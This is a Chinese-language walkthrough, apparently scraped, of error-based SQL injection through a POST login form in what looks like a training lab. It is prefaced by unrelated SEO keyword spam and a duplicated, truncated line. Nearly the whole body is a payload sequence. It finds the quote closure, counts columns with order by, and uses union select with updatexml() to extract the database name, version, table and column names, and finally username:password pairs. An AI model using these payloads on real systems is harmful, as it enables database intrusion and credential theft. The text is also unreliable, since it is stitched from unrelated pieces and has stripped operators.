iis 多网站安全设置,淘宝详情页模板,分析公司网站的开发策略,做企业网站的费用post提交报错注入 闭合方式及注入点
利用hackbar进行注入#xff0c;构造post语句 unameaaapasswdbbbSubmitSubmit 页面报错#xff0c;根据分析#xff0c;闭合方式. 确定列数
构造 unameaaa or 11 # passwdbbbSubmitSubmit 确定存在注…post提交报错注入 闭合方式及注入点
利用hackbar进行注入构造post语句 unameaaapasswdbbbSubmitSubmit 页面报错根据分析闭合方式. 确定列数
构造 unameaaa or 11 # passwdbbbSubmitSubmit 确定存在注入 unameaaa order by 3 # passwdbbbSubmitSubmit 有报错 unameaaa order by 2 # passwdbbbSubmitSubmit 无报错列数2 回显位置 unameaaa union select 1,2 # passwdbbbSubmitSubmit 发现页面没有回显想到前面 存在报错想到报错注入 使用updatexml()函数来进行报错注入
查询数据库与版本等 unameaaa union select 1,updatexml(1,concat(‘~’,(select database())),3) # passwdbbbSubmitSubmit 数据库名unameaaa union select 1,updatexml(1,concat(‘~’,(select version())),3) # passwdbbbSubmitSubmit 版本 爆出所有数据库 unameaaa union select 1,updatexml(1,concat(‘~’,(select schema_name from information_schema.schemata limit 0,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select schema_name from information_schema.schemata limit 5,1)),3) # passwdbbbSubmitSubmit 通过修改limit函数的值来查询所有的数据库名 爆出所有表名 unameaaa union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schemadatabase() limit 0,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schemadatabase() limit 1,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schemadatabase() limit 2,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schemadatabase() limit 3,1)),3) # passwdbbbSubmitSubmit 得到users表 爆出列名 unameaaa union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schemadatabase() and table_name‘users’ limit 0,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schemadatabase() and table_name‘users’ limit 1,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schemadatabase() and table_name‘users’ limit 2,1)),3) # passwdbbbSubmitSubmit 得到列id,username,password 爆出数据 unameaaa union select 1,updatexml(1,concat(‘~’,(select concat(username,‘:’,password) from security.users limit 0,1)),3) # passwdbbbSubmitSubmit 修改0的值就可以得到所有的数据 完成
